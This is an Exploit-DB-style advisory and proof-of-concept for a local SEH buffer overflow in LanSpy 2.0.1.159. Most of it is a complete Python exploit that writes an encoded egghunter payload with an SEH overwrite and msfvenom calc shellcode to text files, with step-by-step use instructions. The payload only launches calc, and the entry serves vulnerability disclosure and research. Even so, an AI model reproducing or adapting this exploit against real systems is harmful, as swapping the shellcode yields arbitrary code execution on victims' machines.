LanSpy 2.0.1.159 - Local Buffer Overflow (SEH) (Egghunter)

vendor:

LanSpy

by:

bzyo

7.8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: LanSpy

Affected Version From: 2.0.1.159

Affected Version To: 2.0.1.159

Patch Exists: YES

Related CWE: N/A

CPE: a:lizardsystems:lanspy:2.0.1.159

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7 SP1 x86

2018

LanSpy 2.0.1.159 – Local Buffer Overflow (SEH) (Egghunter)

LanSpy 2.0.1.159 is vulnerable to a local buffer overflow vulnerability when a specially crafted payload is sent to the application. This can be exploited to execute arbitrary code by overwriting the SEH handler with a pointer to the egghunter payload.

Mitigation:

Upgrade to the latest version of LanSpy 2.0.1.159 or apply the patch provided by the vendor.

Source

Exploit-DB raw data:

# Exploit Title: LanSpy 2.0.1.159 - Local Buffer Overflow (SEH) (Egghunter)
# Exploit Author: bzyo
# Date: 12-19-18
# Twitter: @bzyo_
# Vulnerable Software: LanSpy 2.0.1.159
# Vendor Homepage: https://lizardsystems.com
# Version: 2.0.1.159 
# Software Link 1: https://www.exploit-db.com/apps/70a780b78ee7dbbbbc99852259f75d53-lanspy_setup_2.0.1.159.exe
# Software Link 2: https://lizardsystems.com/download/lanspy_setup.exe
# Tested Windows 7 SP1 x86

# PoC
# 1. run script
# 2. copy/paste calcpayload.txt contents into scan section of app
# 3. remove previous search contents
# 4. copy/paste egghpayload.txt contents into scan section of app
# 5. wait for egg to be found
# 6. pop calc

# was working on this when i saw seh poc published
# submitting for the lulz

# original dos poc from Gionathan "John" Reale, EDB: 45968
# original seh poc from Juan Prescotto, EDB: 46009

#badchars; 0's 1's and 20; maybe more?

#!/usr/bin/python

import struct
 
file1="calcpayload.txt"
file2="egghpayload.txt"

#egghunter payload
junk3 = "A"*506

#125 bytes encoded egghunter 'BZYO'
#msfvenom -p generic/custom PAYLOADFILE=eggh -e x86/alpha_mixed -f python
eggh =  ""
eggh += "\x89\xe5\xdd\xc2\xd9\x75\xf4\x5a\x4a\x4a\x4a\x4a\x4a"
eggh += "\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37"
eggh += "\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
eggh += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
eggh += "\x50\x38\x41\x42\x75\x4a\x49\x62\x46\x6e\x61\x6b\x7a"
eggh += "\x39\x6f\x34\x4f\x71\x52\x76\x32\x63\x5a\x45\x52\x63"
eggh += "\x68\x6a\x6d\x54\x6e\x37\x4c\x54\x45\x31\x4a\x30\x74"
eggh += "\x78\x6f\x78\x38\x42\x6f\x50\x59\x43\x6a\x53\x72\x6c"
eggh += "\x4b\x68\x7a\x6e\x4f\x31\x65\x4a\x4a\x6e\x4f\x31\x65"
eggh += "\x4b\x57\x6b\x4f\x6b\x57\x41\x41"

#jump to eggh
jmp2 = "\xe9\x30\xff\xff\xff"

junk2 = "\xcc"*6

#jump to jmp2
jmp1 = "\xcc\xcc\xeb\xf1\xcc\xcc"

junk1 = "\xcc"*16

#jump to jmp1
nseh = "\xeb\xea\xcc\xcc"

#0x00458148 : pop ecx # pop ebp # ret 0x04
seh = struct.pack('<L',0x00458148)

#10 nops
nops = "\x90"*10

egghpayload = junk3 + nops + eggh + nops + jmp2 + junk2 + jmp1 + junk1 + nseh + seh

#calc payload
calcjunk1 = "D"*26

#8 byte egg
bzyo = "OYZBOYZB"

#440 bytes for calc
#msfvenom -p windows/exec CMD="calc" -e x86/alpha_mixed -f python
calc =  ""
calc += "\x89\xe2\xdd\xc5\xd9\x72\xf4\x58\x50\x59\x49\x49\x49"
calc += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
calc += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
calc += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
calc += "\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x58\x68\x6f"
calc += "\x72\x63\x30\x53\x30\x55\x50\x45\x30\x4b\x39\x79\x75"
calc += "\x54\x71\x39\x50\x33\x54\x4e\x6b\x52\x70\x66\x50\x6c"
calc += "\x4b\x73\x62\x34\x4c\x4c\x4b\x71\x42\x32\x34\x4c\x4b"
calc += "\x71\x62\x47\x58\x34\x4f\x4e\x57\x62\x6a\x46\x46\x35"
calc += "\x61\x6b\x4f\x6c\x6c\x35\x6c\x51\x71\x33\x4c\x74\x42"
calc += "\x76\x4c\x71\x30\x4f\x31\x68\x4f\x76\x6d\x77\x71\x7a"
calc += "\x67\x5a\x42\x58\x72\x56\x32\x32\x77\x4c\x4b\x43\x62"
calc += "\x52\x30\x6e\x6b\x30\x4a\x67\x4c\x4c\x4b\x50\x4c\x34"
calc += "\x51\x44\x38\x49\x73\x50\x48\x35\x51\x5a\x71\x76\x31"
calc += "\x6c\x4b\x66\x39\x37\x50\x33\x31\x78\x53\x6c\x4b\x53"
calc += "\x79\x57\x68\x69\x73\x56\x5a\x77\x39\x4e\x6b\x46\x54"
calc += "\x6c\x4b\x56\x61\x6a\x76\x30\x31\x4b\x4f\x4c\x6c\x49"
calc += "\x51\x48\x4f\x44\x4d\x47\x71\x59\x57\x65\x68\x4b\x50"
calc += "\x52\x55\x69\x66\x34\x43\x71\x6d\x4b\x48\x37\x4b\x63"
calc += "\x4d\x66\x44\x70\x75\x4b\x54\x63\x68\x4c\x4b\x70\x58"
calc += "\x31\x34\x75\x51\x4a\x73\x45\x36\x6e\x6b\x76\x6c\x42"
calc += "\x6b\x4e\x6b\x32\x78\x67\x6c\x57\x71\x59\x43\x4e\x6b"
calc += "\x47\x74\x4e\x6b\x45\x51\x68\x50\x4d\x59\x30\x44\x34"
calc += "\x64\x61\x34\x43\x6b\x31\x4b\x61\x71\x70\x59\x70\x5a"
calc += "\x70\x51\x6b\x4f\x79\x70\x61\x4f\x43\x6f\x42\x7a\x6e"
calc += "\x6b\x47\x62\x48\x6b\x4c\x4d\x31\x4d\x52\x4a\x77\x71"
calc += "\x4e\x6d\x6f\x75\x6e\x52\x53\x30\x65\x50\x57\x70\x30"
calc += "\x50\x50\x68\x50\x31\x6e\x6b\x52\x4f\x4f\x77\x39\x6f"
calc += "\x69\x45\x4f\x4b\x68\x70\x6f\x45\x39\x32\x36\x36\x52"
calc += "\x48\x4e\x46\x6c\x55\x6d\x6d\x4f\x6d\x49\x6f\x4a\x75"
calc += "\x57\x4c\x36\x66\x53\x4c\x35\x5a\x4f\x70\x49\x6b\x39"
calc += "\x70\x53\x45\x74\x45\x6f\x4b\x71\x57\x45\x43\x33\x42"
calc += "\x70\x6f\x52\x4a\x65\x50\x66\x33\x59\x6f\x7a\x75\x55"
calc += "\x33\x33\x51\x32\x4c\x65\x33\x33\x30\x41\x41"

calcjunk2 = "E"*30

calcpayload = calcjunk1 + bzyo + calc + calcjunk2 

textfile = open(file1 , 'w')
textfile.write(calcpayload)
textfile.close()
textfile = open(file2 , 'w')
textfile.write(egghpayload)
textfile.close()